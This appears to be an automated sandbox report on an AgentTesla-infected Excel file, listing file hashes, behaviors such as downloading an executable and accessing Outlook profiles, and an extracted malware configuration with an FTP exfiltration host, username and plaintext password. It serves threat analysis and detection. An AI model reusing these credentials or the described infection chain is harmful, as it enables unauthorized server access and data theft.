General
-
Target
Package.xls
-
Size
391KB
-
Sample
231207-y52vsafd34
-
MD5
3e33c8cf5b3ce2fa86f1b0ab22d2d3c2
-
SHA1
de4c28fc5c4eab8c71b09830ff295b901be6a844
-
SHA256
7712b3d4b61189ccbafdbcc285b7a761d517bb68295626e30c33c24c38fb95cd
-
SHA512
0ef6016a7e6d0a45d9358ee21ddacea1b0aa393f276dadc32f3218c89f41fbea9ac765b5127c60cc8c069eb26ee52ffb740d0a7eb2af6ccf20a68e7740852354
-
SSDEEP
6144:ln1m9kdbQS6vsB3qfLWnNnBkbE9UX3yhnpC3quvmb6SrnV3LYpMMAI:lOeuvsB351Bkr3yh9b9hr
Static task
static1
Behavioral task
behavioral1
Sample
Package.xls
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
Package.xls
Resource
win10-20231025-en
Behavioral task
behavioral3
Sample
Package.xls
Resource
win10v2004-20231201-en
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.experthvac.ro - Port:
21 - Username:
[email protected] - Password:
-8{jszMOY*Z8(~Za0#jyP%o7VoB.0)kk^)7_
Targets
-
-
Target
Package.xls
-
Size
391KB
-
MD5
3e33c8cf5b3ce2fa86f1b0ab22d2d3c2
-
SHA1
de4c28fc5c4eab8c71b09830ff295b901be6a844
-
SHA256
7712b3d4b61189ccbafdbcc285b7a761d517bb68295626e30c33c24c38fb95cd
-
SHA512
0ef6016a7e6d0a45d9358ee21ddacea1b0aa393f276dadc32f3218c89f41fbea9ac765b5127c60cc8c069eb26ee52ffb740d0a7eb2af6ccf20a68e7740852354
-
SSDEEP
6144:ln1m9kdbQS6vsB3qfLWnNnBkbE9UX3yhnpC3quvmb6SrnV3LYpMMAI:lOeuvsB351Bkr3yh9b9hr
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Accesses Microsoft Outlook profiles
-
Suspicious use of SetThreadContext
-